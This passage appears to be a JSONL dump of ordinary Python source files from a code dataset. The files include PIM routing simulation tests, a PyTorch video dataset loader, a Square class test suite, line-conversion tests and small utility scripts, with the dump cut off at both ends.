1, \"Olist should have 1 interface\")\n\n def test_3_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 1), ('sn1', 1)),\n ])\n\n # Act\n NetworkEvent.disjoin_node_link(40.0, 'A', 'sn0')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.ForwardState),\n ('B', 'sn1', Downstream, None, down_sm.NoInfoState),\n ])\n\n self.assertEqual(\n len(rts['B_t'].olist), 1, \"Olist should have 1 element (router A)\")\n\n def test_3_2(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn1', 1)),\n ('B', ('sn0', 1), ('sn1', 1)),\n ])\n\n # Act\n NetworkEvent.join_node_link(40.0, 'A', 'sn0')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn0', Upstream, None, None),\n ('A', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ])\n\n def test_3_3(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 1), ('sn1', 1)),\n ])\n\n self.set_members('A', False)\n\n # Act\n NetworkEvent.disjoin_node_link(40.0, 'A', 'sn0')\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.PrunedState),\n ('B', 'sn1', Downstream, None, down_sm.PrunnedState),\n ])\n\n self.assertEqual(len(rts['B_t'].olist), 0, \"Olist should be empty\")\n\n def test_4_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 2)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ])\n\n # Act\n NetworkEvent.change_interface_cost(40, 'A', 'sn0', 3)\n\n # note this is the exact opposite of Assert section below\n def assert_A_is_winner():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ])\n\n self.schedule_action(41, assert_A_is_winner)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState\n ),\n ('B', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.PrunnedState),\n ])\n\n self.assertEqual(len(rts['B_t'].olist), 0, \"Olist should be empty\")\n\n def test_4_2(self):\n def pre_cost_ch_assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ])\n\n def pos_cost_ch_assert():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.NoInfoState),\n ])\n\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 2)),\n ('B', ('sn0', 2), ('sn1', 3)),\n ('C', ('sn1', 3)),\n ])\n\n # Act\n self.schedule_action(39, pre_cost_ch_assert)\n NetworkEvent.change_interface_cost(40, 'A', 'sn0', 3)\n self.schedule_action(41, pos_cost_ch_assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.NoInfoState, down_sm.NoInfoState),\n ])\n\n def test_5_1_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ('D', ('sn1', 1)),\n ])\n\n self._schedule_missfire(26, \"D\", \"sn1\", \"send_join\")\n\n\n def _assert_prunned_pending():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunePendingState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n def _assert_prunned():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunnedState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n def _assert_noinfo():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n self.schedule_action(40.1, _assert_prunned_pending)\n self.schedule_action(43.1, _assert_prunned)\n self.schedule_action(45, _assert_prunned)\n self.schedule_action(46, _assert_noinfo)\n self.schedule_action(math.inf, _assert_noinfo)\n\n # Act\n self.set_members('C', False, 40)\n self.sim.run()\n\n def test_5_1_2(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ('D', ('sn1', 1)),\n ])\n\n self._schedule_missfire(26, \"D\", \"sn1\", \"send_join\") # 1st Prune\n self._schedule_missfire(44, \"D\", \"sn1\", \"send_join\") # PruneEcho\n\n def _assert_prunned_pending():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunePendingState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n def _assert_prunned():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.PrunnedState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n def _assert_noinfo():\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, None, down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.PrunedState),\n ('D', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n self.schedule_action(40.1, _assert_prunned_pending)\n self.schedule_action(43.1, _assert_prunned)\n self.schedule_action(45, _assert_prunned) # after 1st prune\n self.schedule_action(46, _assert_prunned) # after PruneEcho\n self.schedule_action(88, _assert_noinfo) # after StateRefresh\n self.schedule_action(math.inf, _assert_noinfo)\n\n # Act\n self.set_members('C', False, 40)\n self.sim.run()\n\n\n def test_5_2_1(self):\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 2), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ])\n\n # Act\n self._schedule_missfire(10, \"A\", \"sn1\", \"send_assert\")\n\n def _assert():\n self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState,\n down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n # at 50 seconds a new data msg is sent\n # assert that A is prunned\n self.schedule_action(48, _assert)\n self.schedule_action(52, _assert)\n\n self.sim.run()\n\n # Assert\n rts = self.assert_routers([\n ('A', 'sn1', Downstream, assert_sm.WinnerState, down_sm.NoInfoState),\n ('B', 'sn1', Downstream, assert_sm.LoserState, down_sm.NoInfoState),\n ])\n\n self.assertEqual(\n len(rts['A_t'].olist), 1, \"Olist should have 1 interface\")\n\n def test_5_2_2(self):\n def _assert_B_in_looser():\n self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.ForwardState),\n ('B', 'sn1', Downstream, assert_sm.LoserState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n def _assert_B_in_noinfo():\n self.assert_routers([\n ('A', 'sn1', Upstream, None, up_sm.ForwardState),\n ('B', 'sn1', Downstream, assert_sm.NoInfoState,\n down_sm.NoInfoState),\n ('C', 'sn1', Upstream, None, up_sm.ForwardState),\n ])\n\n # Assemble\n self.set_topo([\n ('S', ('sn0', 1)),\n ('A', ('sn0', 1), ('sn1', 1)),\n ('B', ('sn0', 2), ('sn1', 1)),\n ('C', ('sn1', 1)),\n ])\n\n # Act\n self._schedule_missfire(39, \"A\", \"sn1\", \"send_assert_cancel\")\n NetworkEvent.disjoin_node_link(40, \"A\", 'sn0')\n\n self.schedule_action(41, _assert_B_in_looser)\n\n # the \"+5\" is just a safety margin\n self.schedule_action(25 + 180 - 5, _assert_B_in_looser)\n self.schedule_action(25 + 180 + 5, _assert_B_in_noinfo)\n\n self.sim.run()\n\n # Assert\n _assert_B_in_noinfo()\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()\n","sub_path":"src/tests/test_pim.py","file_name":"test_pim.py","file_ext":"py","file_size_in_byte":21852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"602252358","text":"#name = input('Enter file:')\nhandle = open(\"Ch1.txt\", 'r')\ncounts = dict()\nfor line in handle:\n words = line.split()\n for word in words:\n counts[word] = counts.get(word, 0) + 1\nbigcount = None\nbigword = None\nfor word, count in list(counts.items()):\n if bigcount is None or count > bigcount:\n bigword = word\n bigcount = count\nprint(bigword, bigcount)\n\nprint(\"Ridicarea la putere \", 2 ** 4)\n\nprint(\"Qoutient \" , 7 // 3) # e 2 quotient\nprint(\"Remainder\" , 7%3) #e 1 remainder\n\n\n#ask user for input\ninp = input(\"Input o ceva: \")\nprint(\"Asta a bagat in input: \" + inp)","sub_path":"P4E_Ch1/P4E_Ch1.py","file_name":"P4E_Ch1.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"635514124","text":"import torch.utils.data as data\n\nfrom PIL import Image\nimport os\nimport os.path\nimport numpy as np\nfrom numpy.random import randint\nimport time\nimport lintel\n\nDEBUG_FLAG = False\n\n\nclass VideoRecord(object):\n\n def __init__(self, row):\n self._data = row\n\n @property\n def path(self):\n return self._data[0]\n\n @property\n def num_frames(self):\n return int(self._data[1])\n\n @property\n def label(self):\n return int(self._data[2])\n\n\nclass TSNDataSet(data.Dataset):\n\n def __init__(self, root_path, list_file,\n num_segments=3, new_length=1,\n image_tmpl='img_{:05d}.jpg', transform=None,\n force_grayscale=False, random_shift=True, test_mode=False,\n read_mode='img', skip=0):\n\n self.root_path = root_path\n self.list_file = list_file\n self.num_segments = num_segments\n self.new_length = new_length\n self.image_tmpl = image_tmpl\n self.transform = transform\n self.random_shift = random_shift\n self.test_mode = test_mode\n self.read_mode = read_mode\n self.skip = skip\n\n self.need_length = new_length * (skip + 1) - skip\n\n self._parse_list()\n\n def _load_image(self, directory, idx):\n return [Image.open(os.path.join(directory, self.image_tmpl.format(idx))).convert('RGB')]\n\n def _load_image_from_video(self, video_data, p):\n return [Image.fromarray(video_data[p])]\n\n def _parse_list(self):\n self.video_list = [VideoRecord(x.strip().split(' '))\n for x in open(self.list_file)]\n\n def _sample_indices(self, record):\n \"\"\"\n\n :param record: VideoRecord\n :return: list\n \"\"\"\n\n average_duration = (record.num_frames -\n self.need_length + 1) // self.num_segments\n if average_duration > 0:\n offsets = np.multiply(list(range(self.num_segments)), average_duration) + \\\n randint(average_duration, size=self.num_segments)\n elif record.num_frames > self.need_length:\n offsets = np.sort(randint(record.num_frames -\n self.need_length + 1, size=self.num_segments))\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets\n\n def _get_val_indices(self, record):\n if record.num_frames > self.num_segments + self.need_length - 1:\n tick = (record.num_frames - self.need_length + 1) / \\\n float(self.num_segments)\n offsets = np.array([int(tick / 2.0 + tick * x)\n for x in range(self.num_segments)])\n else:\n offsets = np.zeros((self.num_segments,))\n return offsets\n\n def _get_test_indices(self, record):\n\n return self._get_val_indices(record)\n\n def __getitem__(self, index):\n record = self.video_list[index]\n\n if not self.test_mode:\n segment_indices = self._sample_indices(\n record) if self.random_shift else self._get_val_indices(record)\n else:\n segment_indices = self._get_test_indices(record)\n\n return self.get(record, segment_indices)\n\n def _get_full_indices(self, indices, num_frames):\n full_indices = []\n for seg_ind in indices:\n p = int(seg_ind)\n for i in range(self.new_length):\n full_indices.append(p)\n if p < num_frames - 1:\n p += 1 + self.skip\n if p >= num_frames:\n p = num_frames - 1\n full_indices = list(set(full_indices))\n full_indices.sort()\n return full_indices\n\n def get(self, record, indices):\n\n images = list()\n debug_info = []\n if self.read_mode == 'video':\n video_data = {}\n t1 = time.time()\n finish_flag = False\n full_indices = self._get_full_indices(indices, record.num_frames)\n with open(os.path.join(self.root_path, record.path), 'rb') as f:\n enc_vid = f.read()\n df, w, h = lintel.loadvid_frame_nums(\n enc_vid, frame_nums=full_indices)\n df = np.reshape(df, (len(full_indices), h, w, 3))\n for i in range(len(full_indices)):\n video_data[full_indices[i]] = df[i]\n t2 = time.time()\n debug_info.append('read video: {:.4f}s'.format(t2 - t1))\n\n t1 = time.time()\n for seg_ind in indices:\n p = int(seg_ind)\n for i in range(self.new_length):\n if self.read_mode == 'video':\n seg_imgs = self._load_image_from_video(video_data, p)\n else:\n seg_imgs = self._load_image(\n os.path.join(self.root_path, record.path), p)\n images.extend(seg_imgs)\n if p < record.num_frames - 1:\n p += 1 + self.skip\n if p >= record.num_frames:\n p = record.num_frames - 1\n t2 = time.time()\n debug_info.append('load image: {:.4f}s'.format(t2 - t1))\n\n t1 = time.time()\n process_data = self.transform(images)\n t2 = time.time()\n debug_info.append('transform data: {:.4f}s'.format(t2 - t1))\n if DEBUG_FLAG:\n print(debug_info)\n return process_data, record.label\n\n def __len__(self):\n return len(self.video_list)\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"33204950","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\environment\\effects\\impactEffect.py\nONESHOT_EVENTS = ['shieldboost', 'shieldhardening']\n__author__ = 'stevem'\nfrom eve.client.script.environment.effects.GenericEffect import GenericEffect, STOP_REASON_DEFAULT\n\nclass ImpactEffect(GenericEffect):\n __guid__ = 'effects.ImpactEffect'\n\n def Start(self, duration):\n shipBall = self.GetEffectShipBall()\n model = getattr(shipBall, 'model', None)\n if model is not None:\n if self.animationName is not None:\n self.AddSoundToEffect(scaler=4.0, model=model)\n model.SetImpactAnimation(self.animationName, True, self.duration / 1000.0)\n event = 'ship_effect_%s_play' % self.animationName\n self.SendAudioEvent(event)\n return\n\n def Stop(self, reason=STOP_REASON_DEFAULT):\n shipBall = self.GetEffectShipBall()\n model = getattr(shipBall, 'model', None)\n if model is not None:\n if self.animationName is not None:\n model.SetImpactAnimation(self.animationName, False, self.duration / 1000.0)\n if self.animationName not in ONESHOT_EVENTS:\n event = 'ship_effect_%s_stop' % self.animationName\n self.SendAudioEvent(event)\n if self.observer is not None:\n self.observer = None\n return\n\n def Repeat(self, duration):\n shipBall = self.GetEffectShipBall()\n model = getattr(shipBall, 'model', None)\n if model is not None:\n if self.animationName is not None:\n model.SetImpactAnimation(self.animationName, True, self.duration / 1000.0)\n if self.animationName in ONESHOT_EVENTS:\n event = 'ship_effect_%s_play' % self.animationName\n self.SendAudioEvent(event)\n return","sub_path":"client/eve/client/script/environment/effects/impactEffect.py","file_name":"impactEffect.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"396406647","text":"import sqlite3\nimport time\n\ndef update_base():\n conn = sqlite3.connect('USERS.sqlite')\n cursor = conn.cursor()\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Us\")\n rows = cur.fetchall()\n\n for i in range(len(rows)):\n rows[i] = list(rows[i])\n\n conn.commit()\n cursor.close()\n conn.close()\n return rows\n\ndef time_changes():\n while True:\n conn = sqlite3.connect('USERS.sqlite')\n cursor = conn.cursor()\n users = update_base()\n for user in users:\n if int(user[3]) > -10:\n cursor.execute('UPDATE Us SET bonus_time=' + '\"' +str(int(user[3]) - 1)+ '\"' + ' WHERE id=' + str(user[0]))\n if int(user[4]) > -10:\n cursor.execute('UPDATE Us SET work_time=' + '\"' +str(int(user[4]) - 1) + '\"' +' WHERE id=' + str(user[0]))\n cursor.close()\n conn.commit()\n conn.close()\n time.sleep(1)\n\ntime_changes()","sub_path":"BOT/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"177349594","text":"import math, numpy, random, cv2\n\nheight = 300\nwidth = 400\n\ndef _norm_to_pts(rho, theta):\n if abs(theta) < math.pi/180:\n pt1 = (int(math.cos(theta)*rho), 0)\n pt2 = (int(math.cos(theta)*rho), height)\n else: \n m = -1 / math.tan(theta)\n b = rho / math.sin(theta)\n pt1 = (0, int(b))\n pt2 = (width, int(m * width + b))\n (_, pt1, pt2) = cv2.clipLine((0, 0, width, height), pt1, pt2)\n return (pt1, pt2)\n\ndef _pts_to_norm(x1, y1, x2, y2):\n # expressions for rho and theta calculated with mathematica\n rho = 0\n theta = 0\n if x1 == x2 and y1 == y2:\n print(\"Unable to convert to normal form. Points too close together.\")\n print(\"coordinates: \" + str((x1, y1)) + str((x2, y2)))\n (rho, theta) = (-1, -1) \n elif y1 == y2:\n (rho, theta) = ((y1 + y2)/2, math.pi/2)\n elif x1 == x2:\n (rho, theta) = ((x1 + x2)/2, 0)\n else:\n rho = (x1 * y2 - y1 * x2) / ((y2 - y1) * math.sqrt(1+((x1 - x2)/(y2 - y1))**2))\n theta = math.atan((x1-x2)/(y2-y1))\n if theta < 0:\n theta = theta + math.pi\n rho = -1 * rho\n return (rho, theta)\n\nprint(\"phase 1\")\nfor _ in range(10):\n (rho, theta) = (random.random()*height, random.random() * math.pi/2)\n ((x1, y1), (x2, y2)) = _norm_to_pts(rho, theta)\n (rho_, theta_) = _pts_to_norm(x1, y1, x2, y2)\n try:\n assert(abs(rho - rho_) <= 2)\n except Exception as e:\n print('rho failed')\n print((rho, theta))\n print((rho_, theta_))\n try:\n assert(abs(theta - theta_) <= 2*math.pi/180)\n except Exception as e:\n print('theta failed')\n print((rho, theta))\n print((rho_, theta_))\n\nprint(\"phase 2\")\n\ntestpts = [(16, 293, 285, 297), (24, 212, 113, 213), (32, 142, 268, 146), (37, 78, 265, 82), (107, 293, 110, 214), (165, 83, 166, 143), (25, 235, 25, 228), (191, 146, 196, 295), (197, 295, 286, 296), (26, 211, 33, 144), (74, 214, 109, 214), (271, 147, 284, 295), (218, 147, 226, 294), (166, 290, 166, 219), (249, 220, 254, 291), (204, 80, 243, 80), (110, 212, 113, 145), (270, 147, 275, 212), (190, 81, 192, 143), (223, 215, 251, 215), (24, 213, 73, 214), (217, 147, 220, 210), (19, 292, 24, 236), (241, 110, 244, 144), (223, 216, 276, 217), (20, 260, 24, 214), (109, 293, 110, 271)]\n\nfor a in testpts:\n (x1, y1, x2, y2) = a\n (rho, theta) = _pts_to_norm(x1, y1, x2, y2)\n ((x1_, y1_), (x2_, y2_)) = _norm_to_pts(rho, theta)\n b = (x1_, y1_, x2_, y2_)\n point_diff_rms = sum(tuple(map(lambda x: abs(x)**2, numpy.subtract(a,b))))\n (rho_, theta_) = _pts_to_norm(*b)\n\n try:\n assert(abs(rho - rho_) <= 2)\n except Exception as e:\n print('rho failed')\n print((rho, theta))\n print((rho_, theta_))\n try:\n assert(abs(theta - theta_) <= math.pi/180)\n except Exception as e:\n print('theta failed')\n print((rho, theta))\n print((rho_, theta_))","sub_path":"Misc_Sources/test_line_conversions.py","file_name":"test_line_conversions.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"385407419","text":"#!/usr/bin/python3\n\"\"\"\nUnittest for Rectangle class\n\"\"\"\nimport unittest\n\nfrom io import StringIO\nfrom unittest.mock import patch\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\n\nclass TestSquare(unittest.TestCase):\n\n def setUp(self):\n Base._Base__nb_objects = 0\n open('Rectangle.json', 'w').close()\n open('Square.json', 'w').close()\n\n def test_sq_id1(self):\n self.a0 = Square(10, 3)\n self.a3 = Square(10, 2, 9, 12)\n self.assertEqual(self.a3.id, 12)\n\n def test_sq_str1(self):\n self.a0 = Square(1, 2)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/0 - 1\\n')\n\n def test_sq_str2(self):\n self.a0 = Square(1, 2, 3)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/3 - 1\\n')\n\n def test_sq_area(self):\n self.a0 = Square(91)\n self.assertEqual(self.a0.area(), 8281)\n\n def test_sq_noargs(self):\n try:\n self.a0 = Square()\n\n except:\n self.assertRaises(TypeError, \"__init__() missing 1 required positional argument: 'size'\")\n\n def test_sq_wrong_size(self):\n with self.assertRaisesRegex(TypeError, \"width must be an integer\"):\n r1 = Square(\"9\")\n\n with self.assertRaisesRegex(TypeError, \"x must be an integer\"):\n r2 = Square(1, \"8\")\n\n with self.assertRaisesRegex(TypeError, \"y must be an integer\"):\n r3 = Square(1, 8, \"9\")\n\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n r4 = Square(-9)\n\n with self.assertRaisesRegex(ValueError, \"width must be > 0\"):\n r5 = Square(0)\n\n def test_sq_wrong_size2(self):\n try:\n self.a0 = Rectangle(1, 2)\n self.a1 = Square(None)\n\n except:\n self.assertRaises(TypeError, \"width must be an integer\")\n\n def test_sq_wrong_size3(self):\n try:\n self.a0 = Rectangle(1, 2)\n self.a1 = Square([])\n\n except:\n self.assertRaises(TypeError, \"width must be an integer\")\n\n def test_sq_bad_size5(self):\n try:\n self.a0 = Square((1, 9))\n\n except:\n self.assertRaises(TypeError, \"width must be an integer\")\n\n def test_sq_bad_x(self):\n with self.assertRaisesRegex(ValueError, \"x must be >= 0\"):\n self.a0 = Square(1, -9, 1)\n\n def test_sq_bad_y(self):\n with self.assertRaisesRegex(ValueError, \"y must be >= 0\"):\n self.a0 = Square(1, 2, -9)\n\n def test_sq_str(self):\n self.a7 = Square(2, 2)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a7)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/0 - 2\\n')\n\n def test_sq_dict(self):\n self.a0 = Square(2, 2)\n r1_dictionary = self.a0.to_dictionary()\n self.assertIs(type(r1_dictionary), dict)\n\n def test_sq_update1(self):\n self.a0 = Square(2, 2)\n self.a0.update()\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (1) 2/0 - 2\\n')\n\n def test_sq_update2(self):\n self.a0 = Square(2, 2)\n self.a0.update(89)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 2\\n')\n\n def test_sq_update3(self):\n self.a0 = Square(2, 2)\n self.a0.update(89, 1)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(), '[Square] (89) 2/0 - 1\\n')\n\n def test_sq_update4(self):\n self.a0 = Square(2, 2)\n self.a0.update(89, 1, 2)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 1\\n')\n\n def test_sq_update5(self):\n self.a0 = Square(2, 2)\n self.a0.update(89, 1, 2, 3)\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/3 - 1\\n')\n\n def test_sq_update7(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{'id': 89})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 2\\n')\n\n def test_sq_update8(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{ 'id': 89, 'size': 1 })\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 2/0 - 1\\n')\n\n def test_sq_update9(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{ 'id': 89, 'size': 1, 'x': 3 })\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 3/0 - 1\\n')\n\n def test_sq_update10(self):\n self.a0 = Square(2, 2)\n self.a0.update(**{ 'id': 89, 'size': 1, 'x': 3, 'y': 8})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n self.assertEqual(f.getvalue(),'[Square] (89) 3/8 - 1\\n')\n\n def test_sq_create1(self):\n self.a0 = Square(1, 0, 0, 89)\n self.a1 = Square.create(**{ 'id': 89 })\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n print(self.a1)\n print(self.a0 is self.a1)\n print(self.a0 == self.a1)\n self.assertEqual(f.getvalue(),\"[Square] (89) 0/0 - 1\\n[Square] (89) 0/0 - 1\\nFalse\\nFalse\\n\")\n\n def test_sq_create2(self):\n self.a0 = Square(1, 0, 0, 89)\n self.a1 = Square.create(**{ 'id': 89, 'size': 1})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n print(self.a1)\n print(self.a0 is self.a1)\n print(self.a0 == self.a1)\n self.assertEqual(f.getvalue(),\"[Square] (89) 0/0 - 1\\n[Square] (89) 0/0 - 1\\nFalse\\nFalse\\n\")\n\n def test_sq_create3(self):\n self.a0 = Square(1, 2, 3, 89)\n self.a1 = Square.create(**{ 'id': 89, 'size': 1, 'x': 2, 'y': 3})\n with patch('sys.stdout', new=StringIO()) as f:\n print(self.a0)\n print(self.a1)\n print(self.a0 is self.a1)\n print(self.a0 == self.a1)\n self.assertEqual(f.getvalue(),\"[Square] (89) 2/3 - 1\\n[Square] (89) 2/3 - 1\\nFalse\\nFalse\\n\")\n\n def test_sq_save1(self):\n Square.save_to_file(None)\n with patch('sys.stdout', new=StringIO()) as f:\n with open(\"Square.json\", \"r\") as file:\n print(file.read())\n self.assertEqual(f.getvalue(),\"[]\\n\")\n\n def test_sq_save2(self):\n Square.save_to_file([])\n with patch('sys.stdout', new=StringIO()) as f:\n with open(\"Square.json\", \"r\") as file:\n print(file.read())\n self.assertEqual(f.getvalue(),\"[]\\n\")\n\n def test_sq_save3(self):\n r0 = Square(90, 2, 3, 7)\n\n Square.save_to_file([Square(90, 2, 3, 7)])\n f_dictionary_list = Square.load_from_file()\n f_dictionary2 = f_dictionary_list[0]\n\n output1 = StringIO()\n print(r0, file=output1, end='')\n contents1 = output1.getvalue()\n output1.close()\n\n output2 = StringIO()\n print(f_dictionary2, file=output2, end='')\n contents2 = output2.getvalue()\n output2.close()\n\n self.assertEqual(contents1, contents2)\n\n def test_sq_no_load(self):\n f_dictionary_list_b = Square.load_from_file()\n output = StringIO()\n print(f_dictionary_list_b, file=output, end='')\n contents = output.getvalue()\n output.close()\n self.assertEqual(contents, \"[]\")\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195095392","text":"import glob\nimport os.path\nimport string\nimport math\n\n# ファイル数から名前を生成する\nclass SequenceName:\n def __init__(self, path_dir_target, extension, radix=36, is_alignment=True):\n self.__path_dir_target = path_dir_target\n self.__extension = extension\n self.__radix = radix\n self.__is_alignment = is_alignment\n self.__files = []\n if not os.path.isdir(self.__path_dir_target): raise Exception('存在するディレクトリのパスを指定して下さい。: {}'.format(self.__path_dir_target))\n \n @property\n def Characters(self):\n if 1 < self.__radix <= 10: return string.digits[:self.__radix]\n elif self.__radix < 26: return string.digits + string.ascii_lowercase[:self.__radix - len(string.digits)]\n elif self.__radix == 26: return string.ascii_lowercase\n elif self.__radix <= 36: return string.digits + string.ascii_lowercase[:self.__radix - len(string.digits)]\n elif self.__radix == 64: return string.digits + string.ascii_lowercase + string.ascii_uppercase + '_-'\n elif self.__radix == 85: return string.digits + string.ascii_lowercase + string.ascii_uppercase + \"!#$%&'()-=~^@`[]{};+,._\"\n raise Exception('radixが未対応値です。2〜36, 64, 85のいずれかの整数値にしてください。2〜36, 64, 85のいずれかの整数値にしてください。')\n\n def Generate(self):\n self.__GetFileNames()\n count = len(self.__files)\n name = self.__GetCountName(count)\n self.__Alignment(count)\n return name\n\n def __GetFileNames(self):\n reg = '*'\n if self.__extension is not None:\n if self.__extension.startswith('.'): reg += self.__extension\n else: reg += '.{}'.format(self.__extension)\n self.__files.clear()\n for path in glob.glob(os.path.join(self.__path_dir_target, reg)):\n if self.__extension is None:\n if os.path.isdir(path): self.__files.append(os.path.basename(path))\n else:\n if os.path.isfile(path): self.__files.append(os.path.splitext(os.path.basename(path))[0])\n sorted(self.__files)\n\n def __GetCountName(self, count:int):\n chars = self.Characters\n if count < len(chars): return (chars)[count]\n else: return self.__GetCountName(count // len(chars)) + (chars)[count % len(chars)]\n\n # 10.pyの名前が出力された直後、0.pyを00.pyとしたい\n def __Alignment(self, count):\n if self.__is_alignment and (count == len(self.__files)):\n import os\n prefix = self.Characters[0]\n for name in self.__files:\n fig = math.floor(math.log(count, self.__radix)) + 1\n if self.__extension: ext = '.' + self.__extension\n else: 